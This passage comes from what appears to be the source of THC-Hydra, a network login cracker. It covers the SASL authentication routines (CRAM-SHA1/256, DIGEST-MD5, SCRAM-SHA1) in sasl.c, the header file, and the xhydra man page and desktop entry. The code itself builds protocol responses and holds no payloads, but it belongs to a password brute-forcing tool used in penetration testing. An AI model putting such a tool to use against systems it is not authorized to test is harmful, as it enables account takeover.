*preppasswd;\n\n if (challenge == NULL) {\n result = NULL;\n return result;\n }\n rc = sasl_saslprep(pass, 0, &preppasswd);\n if (rc) {\n result = NULL;\n return result;\n }\n memset(ipad, 0, sizeof(ipad));\n memset(opad, 0, sizeof(opad));\n if (strlen(preppasswd) >= 64) {\n SHA1_Init(&shac);\n SHA1_Update(&shac, preppasswd, strlen(preppasswd));\n SHA1_Final(sha1_raw, &shac);\n memcpy(ipad, sha1_raw, SHA_DIGEST_LENGTH);\n memcpy(opad, sha1_raw, SHA_DIGEST_LENGTH);\n } else {\n strcpy(ipad, preppasswd); // safe\n strcpy(opad, preppasswd); // safe\n }\n for (i = 0; i < 64; i++) {\n ipad[i] ^= 0x36;\n opad[i] ^= 0x5c;\n }\n SHA1_Init(&shac);\n SHA1_Update(&shac, ipad, 64);\n SHA1_Update(&shac, challenge, strlen(challenge));\n SHA1_Final(sha1_raw, &shac);\n SHA1_Init(&shac);\n SHA1_Update(&shac, opad, 64);\n SHA1_Update(&shac, sha1_raw, SHA_DIGEST_LENGTH);\n SHA1_Final(sha1_raw, &shac);\n for (i = 0; i < SHA_DIGEST_LENGTH; i++) {\n sprintf(result, \"%02x\", sha1_raw[i]);\n result += 2;\n }\n free(preppasswd);\n return result;\n}\n\n/*\nsasl_cram_sha256 computes the cram-sha256 authentication from password string\nand the challenge sent by the server, and stored the value in variable\nresult\nthe parameter result must be able to hold at least 100 bytes!\n*/\nchar *sasl_cram_sha256(char *result, char *pass, char *challenge) {\n char ipad[64];\n char opad[64];\n unsigned char sha256_raw[SHA256_DIGEST_LENGTH];\n SHA256_CTX sha256c;\n int32_t i, rc;\n char *preppasswd;\n\n if (challenge == NULL) {\n result = NULL;\n return result;\n }\n memset(ipad, 0, sizeof(ipad));\n memset(opad, 0, sizeof(opad));\n rc = sasl_saslprep(pass, 0, &preppasswd);\n if (rc) {\n result = NULL;\n return result;\n }\n if (strlen(preppasswd) >= 64) {\n SHA256_Init(&sha256c);\n SHA256_Update(&sha256c, preppasswd, strlen(preppasswd));\n SHA256_Final(sha256_raw, &sha256c);\n memcpy(ipad, sha256_raw, SHA256_DIGEST_LENGTH);\n memcpy(opad, sha256_raw, SHA256_DIGEST_LENGTH);\n } else {\n strcpy(ipad, preppasswd); // safe\n strcpy(opad, preppasswd); // safe\n }\n for (i = 0; i < 64; i++) {\n ipad[i] ^= 0x36;\n opad[i] ^= 0x5c;\n }\n SHA256_Init(&sha256c);\n SHA256_Update(&sha256c, ipad, 64);\n SHA256_Update(&sha256c, challenge, strlen(challenge));\n SHA256_Final(sha256_raw, &sha256c);\n SHA256_Init(&sha256c);\n SHA256_Update(&sha256c, opad, 64);\n SHA256_Update(&sha256c, sha256_raw, SHA256_DIGEST_LENGTH);\n SHA256_Final(sha256_raw, &sha256c);\n for (i = 0; i < SHA256_DIGEST_LENGTH; i++) {\n sprintf(result, \"%02x\", sha256_raw[i]);\n result += 2;\n }\n free(preppasswd);\n return result;\n}\n\n/*\nRFC 2831: Using Digest Authentication as a SASL Mechanism\nthe parameter result must be able to hold at least 500 bytes!!\n*/\nchar *sasl_digest_md5(char *result, char *login, char *pass, char *buffer, char *miscptr, char *type, char *webtarget, int32_t webport, char *header) {\n char *pbuffer = NULL;\n int32_t array_size = 10;\n unsigned char response[MD5_DIGEST_LENGTH];\n char *array[array_size];\n char buffer2[500], buffer3[500], nonce[200], realm[200], algo[20];\n int32_t i = 0, ind = 0, lastpos = 0, currentpos = 0, intq = 0, auth_find = 0;\n MD5_CTX md5c;\n char *preplogin;\n char *preppasswd;\n int32_t rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n\n memset(realm, 0, sizeof(realm));\n if (rc) {\n result = NULL;\n return result;\n }\n rc = sasl_saslprep(pass, 0, &preppasswd);\n if (rc) {\n free(preplogin);\n result = NULL;\n return result;\n }\n // DEBUG S:\n // nonce=\"HB3HGAk+hxKpijy/ichq7Wob3Zo17LPM9rr4kMX7xRM=\",realm=\"tida\",qop=\"auth\",maxbuf=4096,charset=utf-8,algorithm=md5-sess\n // DEBUG S:\n // nonce=\"1Mr6c8WjOd/x5r8GUnGeQIRNUtOVtItu3kQOGAmsZfM=\",realm=\"test.com\",qop=\"auth,auth-int32_t,auth-conf\",cipher=\"rc4-40,rc4-56,rc4,des,3des\",maxbuf=4096,charset=utf-8,algorithm=md5-sess\n // warning some not well configured xmpp server is sending no realm\n // DEBUG S: nonce=\"3448160828\",qop=\"auth\",charset=utf-8,algorithm=md5-sess\n pbuffer = buffer;\n do {\n currentpos++;\n if (pbuffer[0] == '\"') {\n if (intq == 0)\n intq = 1;\n else {\n intq = 0;\n }\n }\n if ((pbuffer[0] == ',') && (intq == 0)) {\n array[ind] = malloc(currentpos);\n strncpy(array[ind], buffer + lastpos, currentpos - 1);\n array[ind][currentpos - 1] = '\\0';\n ind++;\n lastpos += currentpos;\n currentpos = 0;\n }\n pbuffer++;\n } while ((pbuffer[0] > 31) && (ind < array_size));\n // save the latest one\n if (ind < array_size) {\n array[ind] = malloc(currentpos + 1);\n strncpy(array[ind], buffer + lastpos, currentpos);\n array[ind][currentpos] = '\\0';\n ind++;\n }\n for (i = 0; i < ind; i++) {\n // removing space chars between comma separated value if any\n while ((array[i] != NULL) && (array[i][0] == ' ')) {\n char *tmp = strdup(array[i]);\n\n // memset(array[i], 0, sizeof(array[i]));\n strcpy(array[i], tmp + 1);\n free(tmp);\n }\n if (strstr(array[i], \"nonce=\") != NULL) {\n // check if it contains double-quote\n if (strstr(array[i], \"\\\"\") != NULL) {\n // assume last char is also a double-quote\n int32_t nonce_string_len = strlen(array[i]) - strlen(\"nonce=\\\"\") - 1;\n\n if ((nonce_string_len > 0) && (nonce_string_len <= sizeof(nonce) - 1)) {\n strncpy(nonce, strstr(array[i], \"nonce=\") + strlen(\"nonce=\") + 1, nonce_string_len);\n nonce[nonce_string_len] = '\\0';\n } else {\n int32_t j;\n\n for (j = 0; j < ind; j++)\n if (array[j] != NULL)\n free(array[j]);\n hydra_report(stderr, \"Error: DIGEST-MD5 nonce from server could not be extracted\\n\");\n result = NULL;\n return result;\n }\n } else {\n strncpy(nonce, strstr(array[i], \"nonce=\") + strlen(\"nonce=\"), sizeof(nonce) - 1);\n nonce[sizeof(nonce) - 1] = '\\0';\n }\n }\n if (strstr(array[i], \"realm=\") != NULL) {\n if (strstr(array[i], \"\\\"\") != NULL) {\n // assume last char is also a double-quote\n int32_t realm_string_len = strlen(array[i]) - strlen(\"realm=\\\"\") - 1;\n\n if ((realm_string_len > 0) && (realm_string_len <= sizeof(realm) - 1)) {\n strncpy(realm, strstr(array[i], \"realm=\") + strlen(\"realm=\") + 1, realm_string_len);\n realm[realm_string_len] = '\\0';\n } else {\n int32_t i;\n\n for (i = 0; i < ind; i++)\n if (array[i] != NULL)\n free(array[i]);\n hydra_report(stderr, \"Error: DIGEST-MD5 realm from server could not be extracted\\n\");\n result = NULL;\n return result;\n }\n } else {\n strncpy(realm, strstr(array[i], \"realm=\") + strlen(\"realm=\"), sizeof(realm) - 1);\n realm[sizeof(realm) - 1] = '\\0';\n }\n }\n if (strstr(array[i], \"qop=\") != NULL) {\n /*\n The value \"auth\" indicates authentication; the value \"auth-int32_t\"\n indicates authentication with integrity protection; the value \"auth-conf\"\n indicates authentication with integrity protection and encryption.\n */\n auth_find = 1;\n if ((strstr(array[i], \"\\\"auth\\\"\") == NULL) && (strstr(array[i], \"\\\"auth,\") == NULL) && (strstr(array[i], \",auth\\\"\") == NULL)) {\n int32_t j;\n\n for (j = 0; j < ind; j++)\n if (array[j] != NULL)\n free(array[j]);\n hydra_report(stderr, \"Error: DIGEST-MD5 quality of protection only \"\n \"authentication is not supported by server\\n\");\n result = NULL;\n return result;\n }\n }\n if (strstr(array[i], \"algorithm=\") != NULL) {\n if (strstr(array[i], \"\\\"\") != NULL) {\n // assume last char is also a double-quote\n int32_t algo_string_len = strlen(array[i]) - strlen(\"algorithm=\\\"\") - 1;\n\n if ((algo_string_len > 0) && (algo_string_len <= sizeof(algo) - 1)) {\n strncpy(algo, strstr(array[i], \"algorithm=\") + strlen(\"algorithm=\") + 1, algo_string_len);\n algo[algo_string_len] = '\\0';\n } else {\n int32_t j;\n\n for (j = 0; j < ind; j++)\n if (array[j] != NULL)\n free(array[j]);\n hydra_report(stderr, \"Error: DIGEST-MD5 algorithm from server could \"\n \"not be extracted\\n\");\n result = NULL;\n return result;\n }\n } else {\n strncpy(algo, strstr(array[i], \"algorithm=\") + strlen(\"algorithm=\"), sizeof(algo) - 1);\n algo[sizeof(algo) - 1] = '\\0';\n }\n if ((strstr(algo, \"MD5\") == NULL) && (strstr(algo, \"md5\") == NULL)) {\n int32_t j;\n\n for (j = 0; j < ind; j++)\n if (array[j] != NULL)\n free(array[j]);\n hydra_report(stderr, \"Error: DIGEST-MD5 algorithm not based on md5, based on %s\\n\", algo);\n result = NULL;\n return result;\n }\n }\n free(array[i]);\n array[i] = NULL;\n }\n if (!strlen(algo)) {\n // assuming by default algo is MD5\n memset(algo, 0, sizeof(algo));\n strcpy(algo, \"MD5\");\n }\n // xmpp case, some xmpp server is not sending the realm so we have to set it\n // up\n if ((strlen(realm) == 0) && (strstr(type, \"xmpp\") != NULL))\n snprintf(realm, sizeof(realm), \"%s\", miscptr);\n // compute ha1\n // support for algo = MD5\n snprintf(buffer, 500, \"%s:%s:%s\", preplogin, realm, preppasswd);\n MD5_Init(&md5c);\n MD5_Update(&md5c, buffer, strlen(buffer));\n MD5_Final(response, &md5c);\n // for MD5-sess\n if (strstr(algo, \"5-sess\") != NULL) {\n buffer[0] = 0; // memset(buffer, 0, sizeof(buffer)); => buffer is char*!\n\n /* per RFC 2617 Errata ID 1649 */\n if ((strstr(type, \"proxy\") != NULL) || (strstr(type, \"GET\") != NULL) || (strstr(type, \"HEAD\") != NULL)) {\n memset(buffer3, 0, sizeof(buffer3));\n pbuffer = buffer3;\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(pbuffer, \"%02x\", response[i]);\n pbuffer += 2;\n }\n snprintf(buffer, 500, \"%s:%s:%s\", buffer3, nonce, \"hydra\");\n } else {\n memcpy(buffer, response, sizeof(response));\n snprintf(buffer + sizeof(response), 50 - sizeof(response), \":%s:%s\", nonce, \"hydra\");\n }\n MD5_Init(&md5c);\n MD5_Update(&md5c, buffer, strlen(buffer));\n MD5_Final(response, &md5c);\n }\n memset(buffer3, 0, sizeof(buffer3));\n pbuffer = buffer3;\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(pbuffer, \"%02x\", response[i]);\n pbuffer += 2;\n }\n // compute ha2\n // proxy case\n if (strstr(type, \"proxy\") != NULL)\n snprintf(buffer, 500, \"%s:%s\", \"HEAD\", miscptr);\n else\n // http case\n if ((strstr(type, \"GET\") != NULL) || (strstr(type, \"HEAD\") != NULL))\n snprintf(buffer, 500, \"%s:%s\", type, miscptr);\n else\n // sip case\n if (strstr(type, \"sip\") != NULL)\n snprintf(buffer, 500, \"REGISTER:%s:%s\", type, miscptr);\n else\n // others\n if (strstr(type, \"rtsp\") != NULL)\n snprintf(buffer, 500, \"DESCRIBE:%s://%s:%i\", type, webtarget, port);\n else\n // others\n snprintf(buffer, 500, \"AUTHENTICATE:%s/%s\", type, realm);\n\n MD5_Init(&md5c);\n MD5_Update(&md5c, buffer, strlen(buffer));\n MD5_Final(response, &md5c);\n pbuffer = buffer2;\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(pbuffer, \"%02x\", response[i]);\n pbuffer += 2;\n }\n // compute response\n if (!auth_find)\n snprintf(buffer, 500, \"%s:%s\", nonce, buffer2);\n else\n snprintf(buffer, 500, \"%s:%s:%s:%s:%s\", nonce, \"00000001\", \"hydra\", \"auth\", buffer2);\n MD5_Init(&md5c);\n MD5_Update(&md5c, buffer3, strlen(buffer3));\n MD5_Update(&md5c, \":\", 1);\n MD5_Update(&md5c, buffer, strlen(buffer));\n MD5_Final(response, &md5c);\n pbuffer = buffer;\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(pbuffer, \"%02x\", response[i]);\n pbuffer += 2;\n }\n // create the auth response\n if (strstr(type, \"proxy\") != NULL) {\n snprintf(result, 500,\n \"HEAD %s HTTP/1.0\\r\\n%sProxy-Authorization: Digest username=\\\"%s\\\", \"\n \"realm=\\\"%s\\\", response=\\\"%s\\\", nonce=\\\"%s\\\", cnonce=\\\"hydra\\\", \"\n \"nc=00000001, algorithm=%s, qop=auth, uri=\\\"%s\\\"\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\nConnection: keep-alive\\r\\n%s\\r\\n\",\n miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header);\n } else {\n if ((strstr(type, \"imap\") != NULL) || (strstr(type, \"pop\") != NULL) || (strstr(type, \"smtp\") != NULL) || (strstr(type, \"ldap\") != NULL) || (strstr(type, \"xmpp\") != NULL) || (strstr(type, \"nntp\") != NULL)) {\n snprintf(result, 500,\n \"username=\\\"%s\\\",realm=\\\"%s\\\",nonce=\\\"%s\\\",cnonce=\\\"hydra\\\",nc=\"\n \"00000001,algorithm=%s,qop=\\\"auth\\\",digest-uri=\\\"%s/%s\\\",response=%s\",\n preplogin, realm, nonce, algo, type, realm, buffer);\n } else {\n if (strstr(type, \"sip\") != NULL) {\n snprintf(result, 500,\n \"username=\\\"%s\\\",realm=\\\"%s\\\",nonce=\\\"%s\\\",uri=\\\"%s:%s\\\",\"\n \"response=%s\",\n preplogin, realm, nonce, type, realm, buffer);\n } else {\n if (strstr(type, \"rtsp\") != NULL) {\n snprintf(result, 500,\n \"username=\\\"%s\\\", realm=\\\"%s\\\", nonce=\\\"%s\\\", \"\n \"uri=\\\"%s://%s:%i\\\", response=\\\"%s\\\"\\r\\n\",\n preplogin, realm, nonce, type, webtarget, port, buffer);\n } else {\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL)\n snprintf(result, 500,\n \"%s http://%s:%d%s HTTP/1.0\\r\\nHost: %s\\r\\nAuthorization: \"\n \"Digest username=\\\"%s\\\", realm=\\\"%s\\\", response=\\\"%s\\\", \"\n \"nonce=\\\"%s\\\", cnonce=\\\"hydra\\\", nc=00000001, algorithm=%s, \"\n \"qop=auth, uri=\\\"%s\\\"\\r\\nProxy-Authorization: Basic \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\nConnection: \"\n \"keep-alive\\r\\n%s\\r\\n\",\n type, webtarget, webport, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, proxy_authentication[selected_proxy], header);\n else {\n if (use_proxy == 1)\n snprintf(result, 500,\n \"%s http://%s:%d%s HTTP/1.0\\r\\nHost: %s\\r\\nAuthorization: \"\n \"Digest username=\\\"%s\\\", realm=\\\"%s\\\", response=\\\"%s\\\", \"\n \"nonce=\\\"%s\\\", cnonce=\\\"hydra\\\", nc=00000001, algorithm=%s, \"\n \"qop=auth, uri=\\\"%s\\\"\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\nConnection: keep-alive\\r\\n%s\\r\\n\",\n type, webtarget, webport, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header);\n else\n snprintf(result, 500,\n \"%s %s HTTP/1.0\\r\\nHost: %s\\r\\nAuthorization: Digest \"\n \"username=\\\"%s\\\", realm=\\\"%s\\\", response=\\\"%s\\\", \"\n \"nonce=\\\"%s\\\", cnonce=\\\"hydra\\\", nc=00000001, algorithm=%s, \"\n \"qop=auth, uri=\\\"%s\\\"\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\nConnection: keep-alive\\r\\n%s\\r\\n\",\n type, miscptr, webtarget, preplogin, realm, buffer, nonce, algo, miscptr, header);\n }\n }\n }\n }\n }\n free(preplogin);\n free(preppasswd);\n return result;\n}\n\n/*\nRFC 5802: Salted Challenge Response Authentication Mechanism\nNote: SCRAM is a client-first SASL mechanism\nI want to thx Simon Josefsson for his public server test,\nand my girlfriend that let me work on that 2 whole nights ;)\nclientfirstmessagebare must be at least 500 bytes in size!\n*/\nchar *sasl_scram_sha1(char *result, char *pass, char *clientfirstmessagebare, char *serverfirstmessage) {\n int32_t saltlen = 0;\n int32_t iter = 4096;\n char *salt, *nonce, *ic;\n uint32_t resultlen = 0;\n char clientfinalmessagewithoutproof[200];\n char buffer[500];\n unsigned char SaltedPassword[SHA_DIGEST_LENGTH];\n unsigned char ClientKey[SHA_DIGEST_LENGTH];\n unsigned char StoredKey[SHA_DIGEST_LENGTH];\n unsigned char ClientSignature[SHA_DIGEST_LENGTH];\n char AuthMessage[1024];\n char ClientProof[SHA_DIGEST_LENGTH];\n unsigned char clientproof_b64[50];\n char *preppasswd;\n int32_t rc = sasl_saslprep(pass, 0, &preppasswd);\n\n if (rc) {\n result = NULL;\n return result;\n }\n\n /*client-final-message */\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", serverfirstmessage);\n // r=hydra28Bo7kduPpAZLzhRQiLxc8Y9tiwgw+yP,s=ldDgevctH+Kg7b8RnnA3qA==,i=4096\n if (strstr(serverfirstmessage, \"r=\") == NULL) {\n hydra_report(stderr, \"Error: Can't understand server message\\n\");\n free(preppasswd);\n result = NULL;\n return result;\n }\n strncpy(buffer, serverfirstmessage, sizeof(buffer) - 1);\n buffer[sizeof(buffer) - 1] = '\\0';\n nonce = strtok(buffer, \",\");\n // continue to search from the previous successful call\n salt = strtok(NULL, \",\");\n ic = strtok(NULL, \",\");\n iter = atoi(ic + 2);\n if (iter == 0) {\n hydra_report(stderr, \"Error: Can't understand server response\\n\");\n free(preppasswd);\n result = NULL;\n return result;\n }\n if ((nonce != NULL) && (strlen(nonce) > 2))\n snprintf(clientfinalmessagewithoutproof, sizeof(clientfinalmessagewithoutproof), \"c=biws,%s\", nonce);\n else {\n hydra_report(stderr, \"Error: Could not identify server nonce value\\n\");\n free(preppasswd);\n result = NULL;\n return result;\n }\n if ((salt != NULL) && (strlen(salt) > 2) && (strlen(salt) <= sizeof(buffer)))\n // s=ghgIAfLl1+yUy/Xl1WD5Tw== remove the header s=\n strcpy(buffer, salt + 2);\n else {\n hydra_report(stderr, \"Error: Could not identify server salt value\\n\");\n free(preppasswd);\n result = NULL;\n return result;\n }\n\n /* SaltedPassword := Hi(Normalize(password), salt, i) */\n saltlen = from64tobits((char *)salt, buffer);\n if (PKCS5_PBKDF2_HMAC_SHA1(preppasswd, strlen(preppasswd), (unsigned char *)salt, saltlen, iter, SHA_DIGEST_LENGTH, SaltedPassword) != 1) {\n hydra_report(stderr, \"Error: Failed to generate PBKDF2\\n\");\n free(preppasswd);\n result = NULL;\n return result;\n }\n\n/* ClientKey := HMAC(SaltedPassword, \"Client Key\") */\n#define CLIENT_KEY \"Client Key\"\n HMAC(EVP_sha1(), SaltedPassword, SHA_DIGEST_LENGTH, (const unsigned char *)CLIENT_KEY, strlen(CLIENT_KEY), ClientKey, &resultlen);\n\n /* StoredKey := H(ClientKey) */\n SHA1((const unsigned char *)ClientKey, SHA_DIGEST_LENGTH, StoredKey);\n\n /* ClientSignature := HMAC(StoredKey, AuthMessage) */\n snprintf(AuthMessage, 500, \"%s,%s,%s\", clientfirstmessagebare, serverfirstmessage, clientfinalmessagewithoutproof);\n HMAC(EVP_sha1(), StoredKey, SHA_DIGEST_LENGTH, (const unsigned char *)AuthMessage, strlen(AuthMessage), ClientSignature, &resultlen);\n\n /* ClientProof := ClientKey XOR ClientSignature */\n xor(ClientProof, (char *)ClientKey, (char *)ClientSignature, 20);\n to64frombits(clientproof_b64, (const unsigned char *)ClientProof, 20);\n snprintf(result, 500, \"%s,p=%s\", clientfinalmessagewithoutproof, clientproof_b64);\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", result);\n free(preppasswd);\n return result;\n}\n#endif\n" }, { "path": "sasl.h", "content": "\n#include \"hydra-mod.h\"\n#include \"ntlm.h\"\n#include \n#include \n\n#define AUTH_ERROR -1\n#define AUTH_CLEAR 0\n#define AUTH_APOP 1\n#define AUTH_LOGIN 2\n#define AUTH_PLAIN 3\n#define AUTH_CRAMMD5 4\n#define AUTH_CRAMSHA1 5\n#define AUTH_CRAMSHA256 6\n#define AUTH_DIGESTMD5 7\n#define AUTH_SCRAMSHA1 8\n#define AUTH_NTLM 9\n#define AUTH_NTLMv2 10\n#define AUTH_BASIC 11\n#define AUTH_LM 12\n#define AUTH_LMv2 13\n#define AUTH_UNASSIGNED 14\n\n#if LIBIDN\n#include \n#if defined HAVE_PR29_H\n#include \n#endif\n#endif\n\ntypedef enum { SASL_ALLOW_UNASSIGNED = 1 } sasl_saslprep_flags;\n\nint32_t print_hex(unsigned char *buf, int32_t len);\n\nchar *sasl_plain(char *result, char *login, char *pass);\nint32_t sasl_saslprep(const char *in, sasl_saslprep_flags flags, char **out);\n\n#ifdef LIBOPENSSL\n#include \n#include \n#include \n\nchar *sasl_cram_md5(char *result, char *pass, char *challenge);\nchar *sasl_cram_sha1(char *result, char *pass, char *challenge);\nchar *sasl_cram_sha256(char *result, char *pass, char *challenge);\nchar *sasl_digest_md5(char *result, char *login, char *pass, char *buffer, char *miscptr, char *type, char *webtarget, int32_t webport, char *header);\nchar *sasl_scram_sha1(char *result, char *pass, char *clientfirstmessagebare, char *serverfirstmessage);\n#endif\n" }, { "path": "xhydra.1", "content": ".TH \"XHYDRA\" \"1\" \"02/02/2012\"\n.SH NAME\nxhydra \\- Gtk+3 frontend for thc-hydra\n.SH SYNOPSIS\nExecute xhydra in a terminal to start the application.\n.SH DESCRIPTION\nHydra is a parallelized login cracker which supports numerous protocols\nto attack. New modules are easy to add, beside that, it is flexible and\nvery fast.\n.LP\n.B xhydra\nis the graphical fronend for the\n.BR hydra (1)\ntool.\n.SH SEE ALSO\n.BR hydra (1),\n.BR pw-inspector (1).\n.br\n.SH AUTHOR\nhydra was written by van Hauser \n\n.PP\nThis manual page was written by Daniel Echeverry ,\nfor the Debian project (and may be used by others).\n\n" }, { "path": "xhydra.desktop", "content": "[Desktop Entry]\nName=XHydra\nGenericName=Hydra very fast network log-on cracker\nComment=GUI frontend for Hydra network log-on cracker\nVersion=1.0\nExec=xhydra\nIcon=xhydra\nTerminal=false\nType=Application\nCategories=System;Security;GTK;\n" } ]